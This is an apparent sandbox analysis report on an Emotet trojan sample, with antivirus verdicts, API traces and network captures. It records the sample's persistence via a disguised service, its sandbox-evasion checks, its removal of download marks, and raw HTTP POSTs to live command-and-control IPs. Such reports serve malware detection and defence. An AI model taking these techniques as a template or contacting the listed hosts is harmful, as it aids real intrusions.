SmartHawk

10.2

0-day

60 个模型检测该样本为恶意！

重新分析

下载样本

7cc4fc229df156d33491e00ff808b65fb65eb09764dc29d508b5f4c13f057ef7

a31ecfc0a95e1ef421349d6cba912e39.exe

分析耗时

127s

最近分析

文件大小

164.0KB

静态报毒动态报毒 100% 3HS9FHYIKTK AI SCORE=82 AIDETECTGBM ATTRIBUTE CCMW CJRR CONFIDENCE ELDORADO EMOTET EMOTETU GENCIRC GENERICRI GENETIC HIGH CONFIDENCE HIGHCONFIDENCE HWGACLSA KQ0@AGEHMSPM KQ0@BGEHMSPM LBIX MALWARE@#97ZAK1RI95KZ PWISL R + TROJ R349133 S18206467 SCORE SMALL SUSGEN UNSAFE YZY0OKQYGR3JN5HV ZEXAF 更多

未检测暂无鹰眼引擎检测结果

查杀引擎	查杀结果	查杀时间	查杀版本
McAfee	Emotet-FRW!A31ECFC0A95E	20210223	6.0.6.653
CrowdStrike	win/malicious_confidence_100% (W)	20210203	1.0
Alibaba	Trojan:Win32/Emotet.4c88c305	20190527	0.3.0.5
Baidu		20190318	1.0.0.2
Avast	Win32:Malware-gen	20210223	21.1.5827.0
Tencent	Malware.Win32.Gencirc.10cdec41	20210223	1.0.0.1
Kingsoft		20210223	2017.9.26.565

Queries for the computername (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1619781438.88425 GetComputerNameA	computer_name: OSKAR-PC	success	1	0

Uses Windows APIs to generate a cryptographic key (6 个事件)

Time & API	Arguments	Status	Return
1619781425.66525 CryptGenKey	crypto_handle: 0x004cf1c8 algorithm_identifier: 0x0000660e () provider_handle: 0x004ce600 flags: 1 key: far¨áxs:¡=d^¾	success	1
1619781438.91525 CryptExportKey	crypto_handle: 0x004cf1c8 crypto_export_handle: 0x004ce6d8 buffer: f¤²ê%+ê%Kó Q%z'eR§ºoõöÊúÉúJxæ9÷jA£1§.Rèui ÁzJÈîú \jÖ¸`aýã-AÄÑ#ÆsP=òi¯È%^4 blob_type: 1 flags: 64	success	1
1619781465.08725 CryptExportKey	crypto_handle: 0x004cf1c8 crypto_export_handle: 0x004ce6d8 buffer: f¤2HçI\|GkBÁ 1ì>åq`D-Ùò8µç²JÔ Áº.nä.xÓÄgRì+c+Vg²>®û¹É#>²äÁ[ÊÅUa?+ôæ°KÈ< blob_type: 1 flags: 64	success	1
1619781468.99325 CryptExportKey	crypto_handle: 0x004cf1c8 crypto_export_handle: 0x004ce6d8 buffer: f¤»jIúù5åoÜß÷Á4Æù=C]_F=;xÁ"#Ä«Y²Mvvc²{ÿjëd<¸0ýSÖ,%à*ö:k£ø¨#¾gßtõ5Éû¾eúüoU blob_type: 1 flags: 64	success	1
1619781474.66525 CryptExportKey	crypto_handle: 0x004cf1c8 crypto_export_handle: 0x004ce6d8 buffer: f¤èq:Ç£¨¦Í¥§Ç»³[ç¡¿ãKùËs3f_²+#z×ÎÖ@"2vSè®vãgSæØØÃÁÖ µ»¸4N;©Ìã¨Bð»HRÕ©[-~ye blob_type: 1 flags: 64	success	1
1619781498.38425 CryptExportKey	crypto_handle: 0x004cf1c8 crypto_export_handle: 0x004ce6d8 buffer: f¤ãïS0BáÝ½¥³óØó-cÅ6f¯Æ>}fZð3º¾á)1 3-´©ûAÁL Õé<IÐø9ð© ÔÓT_S¼{9àþôpãJ]k Tz»Úáå¶5^U blob_type: 1 flags: 64	success	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 个事件)

suspicious_features

Connection to IP address

suspicious_request

POST http://118.70.15.19:8080/V2HNPHavHiQ/iHQ8MDapNGutkxYy/

Performs some HTTP requests (1 个事件)

request

POST http://118.70.15.19:8080/V2HNPHavHiQ/iHQ8MDapNGutkxYy/

Sends data using the HTTP POST Method (1 个事件)

request

POST http://118.70.15.19:8080/V2HNPHavHiQ/iHQ8MDapNGutkxYy/

Allocates read-write-execute memory (usually to unpack itself) (3 个事件)

Time & API	Arguments	Status
1619781418.87475 NtAllocateVirtualMemory	process_identifier: 2216 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x00330000	success
1619781476.906125 NtAllocateVirtualMemory	process_identifier: 1424 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffffffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x0000000004140000	success
1619781425.36825 NtAllocateVirtualMemory	process_identifier: 1940 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x003a0000	success

Checks whether any human activity is being performed by constantly checking whether the foreground window changed

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (50 个事件)

Time & API	Arguments	Status	Return
1619781425.41525 Process32FirstW	process_name: [System Process] snapshot_handle: 0x00000114 process_identifier: 0	success	1
1619781425.41525 Process32NextW	process_name: System snapshot_handle: 0x00000114 process_identifier: 4	success	1
1619781425.41525 Process32NextW	process_name: smss.exe snapshot_handle: 0x00000114 process_identifier: 276	success	1
1619781425.41525 Process32NextW	process_name: csrss.exe snapshot_handle: 0x00000114 process_identifier: 372	success	1
1619781425.41525 Process32NextW	process_name: csrss.exe snapshot_handle: 0x00000114 process_identifier: 424	success	1
1619781425.41525 Process32NextW	process_name: wininit.exe snapshot_handle: 0x00000114 process_identifier: 432	success	1
1619781425.41525 Process32NextW	process_name: services.exe snapshot_handle: 0x00000114 process_identifier: 476	success	1
1619781425.41525 Process32NextW	process_name: winlogon.exe snapshot_handle: 0x00000114 process_identifier: 508	success	1
1619781425.41525 Process32NextW	process_name: lsass.exe snapshot_handle: 0x00000114 process_identifier: 536	success	1
1619781425.41525 Process32NextW	process_name: lsm.exe snapshot_handle: 0x00000114 process_identifier: 544	success	1
1619781425.41525 Process32NextW	process_name: svchost.exe snapshot_handle: 0x00000114 process_identifier: 656	success	1
1619781425.41525 Process32NextW	process_name: VBoxService.exe snapshot_handle: 0x00000114 process_identifier: 720	success	1
1619781425.41525 Process32NextW	process_name: svchost.exe snapshot_handle: 0x00000114 process_identifier: 788	success	1
1619781425.41525 Process32NextW	process_name: svchost.exe snapshot_handle: 0x00000114 process_identifier: 868	success	1
1619781425.41525 Process32NextW	process_name: svchost.exe snapshot_handle: 0x00000114 process_identifier: 924	success	1
1619781425.41525 Process32NextW	process_name: svchost.exe snapshot_handle: 0x00000114 process_identifier: 956	success	1
1619781425.41525 Process32NextW	process_name: audiodg.exe snapshot_handle: 0x00000114 process_identifier: 112	success	1
1619781425.41525 Process32NextW	process_name: svchost.exe snapshot_handle: 0x00000114 process_identifier: 540	success	1
1619781425.41525 Process32NextW	process_name: svchost.exe snapshot_handle: 0x00000114 process_identifier: 1080	success	1
1619781425.41525 Process32NextW	process_name: spoolsv.exe snapshot_handle: 0x00000114 process_identifier: 1260	success	1
1619781425.41525 Process32NextW	process_name: svchost.exe snapshot_handle: 0x00000114 process_identifier: 1288	success	1
1619781425.41525 Process32NextW	process_name: taskhost.exe snapshot_handle: 0x00000114 process_identifier: 1336	success	1
1619781425.41525 Process32NextW	process_name: dwm.exe snapshot_handle: 0x00000114 process_identifier: 1384	success	1
1619781425.41525 Process32NextW	process_name: explorer.exe snapshot_handle: 0x00000114 process_identifier: 1424	success	1
1619781425.41525 Process32NextW	process_name: svchost.exe snapshot_handle: 0x00000114 process_identifier: 1592	success	1
1619781425.41525 Process32NextW	process_name: svchost.exe snapshot_handle: 0x00000114 process_identifier: 1980	success	1
1619781425.41525 Process32NextW	process_name: taskeng.exe snapshot_handle: 0x00000114 process_identifier: 1240	success	1
1619781425.41525 Process32NextW	process_name: VBoxTray.exe snapshot_handle: 0x00000114 process_identifier: 2072	success	1
1619781425.41525 Process32NextW	process_name: GoogleUpdate.exe snapshot_handle: 0x00000114 process_identifier: 2224	success	1
1619781425.41525 Process32NextW	process_name: SearchIndexer.exe snapshot_handle: 0x00000114 process_identifier: 2380	success	1
1619781425.41525 Process32NextW	process_name: wmpnetwk.exe snapshot_handle: 0x00000114 process_identifier: 2460	success	1
1619781425.41525 Process32NextW	process_name: WmiPrvSE.exe snapshot_handle: 0x00000114 process_identifier: 2672	success	1
1619781425.41525 Process32NextW	process_name: SearchProtocolHost.exe snapshot_handle: 0x00000114 process_identifier: 2744	success	1
1619781425.41525 Process32NextW	process_name: SearchFilterHost.exe snapshot_handle: 0x00000114 process_identifier: 2784	success	1
1619781425.41525 Process32NextW	process_name: svchost.exe snapshot_handle: 0x00000114 process_identifier: 2884	success	1
1619781425.41525 Process32NextW	process_name: pythonw.exe snapshot_handle: 0x00000114 process_identifier: 2132	success	1
1619781425.41525 Process32NextW	process_name: mobsync.exe snapshot_handle: 0x00000114 process_identifier: 2988	success	1
1619781425.41525 Process32NextW	process_name: sdclt.exe snapshot_handle: 0x00000114 process_identifier: 2712	success	1
1619781425.41525 Process32NextW	process_name: pythonw.exe snapshot_handle: 0x00000114 process_identifier: 2144	success	1
1619781425.41525 Process32NextW	process_name: taskhost.exe snapshot_handle: 0x00000114 process_identifier: 2520	success	1
1619781425.41525 Process32NextW	process_name: a31ecfc0a95e1ef421349d6cba912e39.exe snapshot_handle: 0x00000114 process_identifier: 2216	success	1
1619781425.41525 Process32NextW	process_name: uxtheme.exe snapshot_handle: 0x00000114 process_identifier: 1940	success	1
1619781438.91525 Process32NextW	process_name: dllhost.exe snapshot_handle: 0x00000120 process_identifier: 2032	success	1
1619781465.08725 Process32NextW	process_name: mscorsvw.exe snapshot_handle: 0x00000398 process_identifier: 2292	success	1
1619781468.99325 Process32NextW	process_name: mscorsvw.exe snapshot_handle: 0x0000039c process_identifier: 1704	success	1
1619781468.99325 Process32NextW	process_name: GoogleUpdate.exe snapshot_handle: 0x0000039c process_identifier: 3036	success	1
1619781468.99325 Process32NextW	process_name: GoogleUpdate.exe snapshot_handle: 0x0000039c process_identifier: 2656	success	1
1619781468.99325 Process32NextW	process_name: GoogleUpdate.exe snapshot_handle: 0x0000039c process_identifier: 1092	success	1
1619781468.99325 Process32NextW	process_name: sppsvc.exe snapshot_handle: 0x0000039c process_identifier: 2036	success	1
1619781498.38425 Process32NextW	process_name: GoogleUpdate.exe snapshot_handle: 0x0000039c process_identifier: 200	success	1

Moves the original executable to a new location (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1619781423.62475 MoveFileWithProgressW	oldfilepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\a31ecfc0a95e1ef421349d6cba912e39.exe newfilepath: C:\Windows\SysWOW64\rasphone\uxtheme.exe newfilepath_r: C:\Windows\SysWOW64\rasphone\uxtheme.exe flags: 3 oldfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\a31ecfc0a95e1ef421349d6cba912e39.exe	success	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1619781439.21225 GetAdaptersAddresses	flags: 0 family: 0	failed	111	0

Expresses interest in specific running processes (1 个事件)

process

uxtheme.exe

Reads the systems User Agent and subsequently performs requests (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1619781439.04025 InternetOpenW	proxy_bypass: access_type: 0 proxy_name: flags: 0 user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)	success	13369348	0

Communicates with host for which no DNS query was performed (6 个事件)

host	118.70.15.19
host	162.249.220.190
host	172.217.24.14
host	178.128.14.92
host	181.113.229.139
host	85.25.207.108

Installs itself for autorun at Windows startup (1 个事件)

service_name

uxtheme

service_path

C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\rasphone\uxtheme.exe"

Created a service where a service was also not started (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1619781424.35875 CreateServiceW	service_start_name: start_type: 2 service_handle: 0x01f7b390 display_name: uxtheme error_control: 0 service_name: uxtheme filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\rasphone\uxtheme.exe" filepath_r: "C:\Windows\SysWOW64\rasphone\uxtheme.exe" service_manager_handle: 0x01f65450 desired_access: 2 service_type: 16 password:	success	33010576	0

Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 个事件)

Time & API	Arguments	Status
1619781441.77525 RegSetValueExA	key_handle: 0x00000378 value: 1 regkey_r: WpadDecisionReason reg_type: 4 (REG_DWORD) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason	success
1619781441.77525 RegSetValueExA	key_handle: 0x00000378 value: Ú>e²=× regkey_r: WpadDecisionTime reg_type: 3 (REG_BINARY) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime	success
1619781441.77525 RegSetValueExA	key_handle: 0x00000378 value: 3 regkey_r: WpadDecision reg_type: 4 (REG_DWORD) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision	success
1619781441.77525 RegSetValueExW	key_handle: 0x00000378 value: 网络 2 regkey_r: WpadNetworkName reg_type: 1 (REG_SZ) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName	success
1619781441.77525 RegSetValueExA	key_handle: 0x00000390 value: 1 regkey_r: WpadDecisionReason reg_type: 4 (REG_DWORD) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason	success
1619781441.77525 RegSetValueExA	key_handle: 0x00000390 value: Ú>e²=× regkey_r: WpadDecisionTime reg_type: 3 (REG_BINARY) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime	success
1619781441.77525 RegSetValueExA	key_handle: 0x00000390 value: 3 regkey_r: WpadDecision reg_type: 4 (REG_DWORD) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision	success
1619781441.79025 RegSetValueExW	key_handle: 0x00000374 value: {40112ABE-63B3-43C3-BE93-1440EE3AF106} regkey_r: WpadLastNetwork reg_type: 1 (REG_SZ) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork	success

Attempts to remove evidence of file being downloaded from the Internet (1 个事件)

file	C:\Windows\SysWOW64\rasphone\uxtheme.exe:Zone.Identifier

File has been identified by 60 AntiVirus engines on VirusTotal as malicious (50 out of 60 个事件)

Bkav	W32.AIDetectGBM.malware.01
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.EmotetU.Gen.kq0@bGehmspm
CAT-QuickHeal	Trojan.GenericRI.S18206467
McAfee	Emotet-FRW!A31ECFC0A95E
Cylance	Unsafe
Zillya	Backdoor.Emotet.Win32.1127
Sangfor	Trojan.Win32.Emotet.PED
CrowdStrike	win/malicious_confidence_100% (W)
Alibaba	Trojan:Win32/Emotet.4c88c305
K7GW	Riskware ( 0040eff71 )
K7AntiVirus	Riskware ( 0040eff71 )
Arcabit	Trojan.EmotetU.Gen.E9A79E
Cyren	W32/Emotet.AQV.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
APEX	Malicious
Avast	Win32:Malware-gen
ClamAV	Win.Dropper.Emotet-9789226-0
Kaspersky	Backdoor.Win32.Emotet.cjrr
BitDefender	Trojan.EmotetU.Gen.kq0@bGehmspm
NANO-Antivirus	Virus.Win32.Gen.ccmw
Paloalto	generic.ml
AegisLab	Trojan.Win32.Small.lbIX
Tencent	Malware.Win32.Gencirc.10cdec41
Ad-Aware	Trojan.EmotetU.Gen.kq0@bGehmspm
TACHYON	Backdoor/W32.Emotet.167936
Emsisoft	Trojan.Emotet (A)
Comodo	Malware@#97zak1ri95kz
F-Secure	Trojan.TR/Emotet.pwisl
DrWeb	Trojan.Emotet.999
VIPRE	Trojan.Win32.Generic!BT
McAfee-GW-Edition	BehavesLike.Win32.Emotet.cm
FireEye	Trojan.EmotetU.Gen.kq0@bGehmspm
Sophos	Mal/Generic-R + Troj/Emotet-CLO
Jiangmin	Backdoor.Emotet.sl
Avira	TR/Emotet.pwisl
Antiy-AVL	Trojan[Backdoor]/Win32.Emotet
Gridinsoft	Trojan.Win32.Emotet.oa
Microsoft	Trojan:Win32/Emotet.PED!MTB
ZoneAlarm	Backdoor.Win32.Emotet.cjrr
GData	Trojan.EmotetU.Gen.kq0@bGehmspm
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win32.Emotet.R349133
BitDefenderTheta	Gen:NN.ZexaF.34574.kq0@aGehmspm
ALYac	Trojan.EmotetU.Gen.kq0@bGehmspm
MAX	malware (ai score=82)
VBA32	Backdoor.Emotet
Malwarebytes	Trojan.Emotet
Zoner	Trojan.Win32.103970
ESET-NOD32	Win32/Emotet.CD

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (8 个事件)

dead_host	85.25.207.108:8080
dead_host	172.217.160.110:443
dead_host	181.113.229.139:443
dead_host	172.217.24.14:443
dead_host	162.249.220.190:80
dead_host	178.128.14.92:8080
dead_host	192.168.56.101:49183
dead_host	192.168.56.101:49184

暂无二进制图像该样本未生成二进制可视化图像

暂无运行截图该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手，可以帮您分析和解读恶意软件报告。请随时向我提问！

🔍 主要威胁分析

⚡ 行为特征

🛡️ 防护建议

🔧 技术手段

🎯 检测方法

🤖

Static Analysis
Strings

PE Compile Time

2020-08-21 23:26:14

Imports

Library WINMM.dll:

• 0x40b140 waveOutGetVolume

• 0x40b144 waveInReset

• 0x40b148 waveInUnprepareHeader

• 0x40b14c waveInClose

• 0x40b150 waveInOpen

• 0x40b154 waveInPrepareHeader

• 0x40b158 waveInAddBuffer

• 0x40b15c waveInStart

• 0x40b160 waveOutSetVolume

• 0x40b164 mixerOpen

• 0x40b168 mixerGetLineInfoA

• 0x40b16c mixerClose

• 0x40b170 mixerGetLineControlsA

• 0x40b174 mixerGetControlDetailsA

• 0x40b178 mixerSetControlDetails

• 0x40b17c mciGetErrorStringA

Library COMCTL32.dll:

• 0x40b000

Library KERNEL32.dll:

• 0x40b024 QueryPerformanceCounter

• 0x40b028 SetStdHandle

• 0x40b02c GetOEMCP

• 0x40b030 GetACP

• 0x40b034 LoadLibraryA

• 0x40b038 IsBadCodePtr

• 0x40b03c IsBadReadPtr

• 0x40b040 InterlockedExchange

• 0x40b044 GetTickCount

• 0x40b048 GetCurrentThreadId

• 0x40b04c OutputDebugStringA

• 0x40b050 VirtualAlloc

• 0x40b054 GetCurrentProcessId

• 0x40b058 GetModuleHandleA

• 0x40b05c ExitProcess

• 0x40b060 GetCPInfo

• 0x40b064 GetLocaleInfoA

• 0x40b068 SetFilePointer

• 0x40b06c SetUnhandledExceptionFilter

• 0x40b070 HeapSize

• 0x40b074 GetFileType

• 0x40b078 SetHandleCount

• 0x40b07c GetEnvironmentStringsW

• 0x40b080 FreeEnvironmentStringsW

• 0x40b084 GetEnvironmentStrings

• 0x40b088 FreeEnvironmentStringsA

• 0x40b08c UnhandledExceptionFilter

• 0x40b090 GetSystemTimeAsFileTime

• 0x40b094 GetStringTypeA

• 0x40b098 GetStringTypeW

• 0x40b09c FlushFileBuffers

• 0x40b0a0 VirtualFree

• 0x40b0a4 RaiseException

• 0x40b0a8 HeapAlloc

• 0x40b0ac RtlUnwind

• 0x40b0b0 GetStartupInfoA

• 0x40b0b4 GetCommandLineA

• 0x40b0b8 GetVersionExA

• 0x40b0bc CloseHandle

• 0x40b0c0 HeapFree

• 0x40b0c4 GetProcAddress

• 0x40b0c8 VirtualProtect

• 0x40b0cc GetSystemInfo

• 0x40b0d0 VirtualQuery

• 0x40b0d4 MultiByteToWideChar

• 0x40b0d8 LCMapStringA

• 0x40b0dc WideCharToMultiByte

• 0x40b0e0 GetLastError

• 0x40b0e4 LCMapStringW

• 0x40b0e8 HeapDestroy

• 0x40b0ec HeapCreate

• 0x40b0f0 HeapReAlloc

• 0x40b0f4 IsBadWritePtr

• 0x40b0f8 TerminateProcess

• 0x40b0fc GetCurrentProcess

• 0x40b100 WriteFile

• 0x40b104 GetStdHandle

• 0x40b108 GetModuleFileNameA

Library USER32.dll:

• 0x40b110 LoadIconA

• 0x40b114 DialogBoxParamA

• 0x40b118 SendMessageA

• 0x40b11c EndDialog

• 0x40b120 GetDlgItem

• 0x40b124 GetClientRect

• 0x40b128 GetDC

• 0x40b12c ReleaseDC

• 0x40b130 GetDlgCtrlID

• 0x40b134 ShowWindow

• 0x40b138 MessageBoxA

Library GDI32.dll:

• 0x40b008 DeleteDC

• 0x40b00c CreateCompatibleDC

• 0x40b010 CreateCompatibleBitmap

• 0x40b014 CreateSolidBrush

• 0x40b018 DeleteObject

• 0x40b01c SelectObject

Hosts

No hosts contacted.

DNS

Name	Response	Post-Analysis Lookup
time.windows.com	A 20.189.79.72 CNAME time.microsoft.akadns.net
dns.msftncsi.com	A 131.107.255.255	131.107.255.255
clients2.google.com	A 172.217.160.110 CNAME clients.l.google.com	216.58.200.238
dns.msftncsi.com	AAAA fd3e:4f5a:5b81::1	131.107.255.255
update.googleapis.com	A 203.208.40.34	203.208.41.34
teredo.ipv6.microsoft.com		127.0.0.1

TCP

Source	Source Port	Destination	Destination Port
192.168.56.101	49196	118.70.15.19	8080

UDP

Source	Source Port	Destination	Destination Port
192.168.56.101	49235	114.114.114.114	53
192.168.56.101	51808	114.114.114.114	53
192.168.56.101	54178	114.114.114.114	53
192.168.56.101	56539	114.114.114.114	53
192.168.56.101	58070	114.114.114.114	53
192.168.56.101	60123	114.114.114.114	53
192.168.56.101	63429	114.114.114.114	53
192.168.56.101	65004	114.114.114.114	53
192.168.56.101	137	192.168.56.255	137
192.168.56.101	138	192.168.56.255	138
192.168.56.101	123	20.189.79.72 time.windows.com	123
192.168.56.101	49713	224.0.0.252	5355
192.168.56.101	50568	224.0.0.252	5355
192.168.56.101	51378	224.0.0.252	5355
192.168.56.101	53210	224.0.0.252	5355
192.168.56.101	53237	224.0.0.252	5355
192.168.56.101	54991	224.0.0.252	5355
192.168.56.101	55368	224.0.0.252	5355
192.168.56.101	56804	224.0.0.252	5355
192.168.56.101	58367	224.0.0.252	5355

HTTP & HTTPS Requests

URI	Data
http://118.70.15.19:8080/V2HNPHavHiQ/iHQ8MDapNGutkxYy/	POST /V2HNPHavHiQ/iHQ8MDapNGutkxYy/ HTTP/1.1 Referer: http://118.70.15.19/V2HNPHavHiQ/iHQ8MDapNGutkxYy/ Content-Type: multipart/form-data; boundary=---------------------------636969975891778 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 118.70.15.19:8080 Content-Length: 4532 Connection: Keep-Alive Cache-Control: no-cache

URI

Data

http://118.70.15.19:8080/V2HNPHavHiQ/iHQ8MDapNGutkxYy/

POST /V2HNPHavHiQ/iHQ8MDapNGutkxYy/ HTTP/1.1
Referer: http://118.70.15.19/V2HNPHavHiQ/iHQ8MDapNGutkxYy/
Content-Type: multipart/form-data; boundary=---------------------------636969975891778
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 118.70.15.19:8080
Content-Length: 4532
Connection: Keep-Alive
Cache-Control: no-cache

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.

Sorry! No dropped buffers.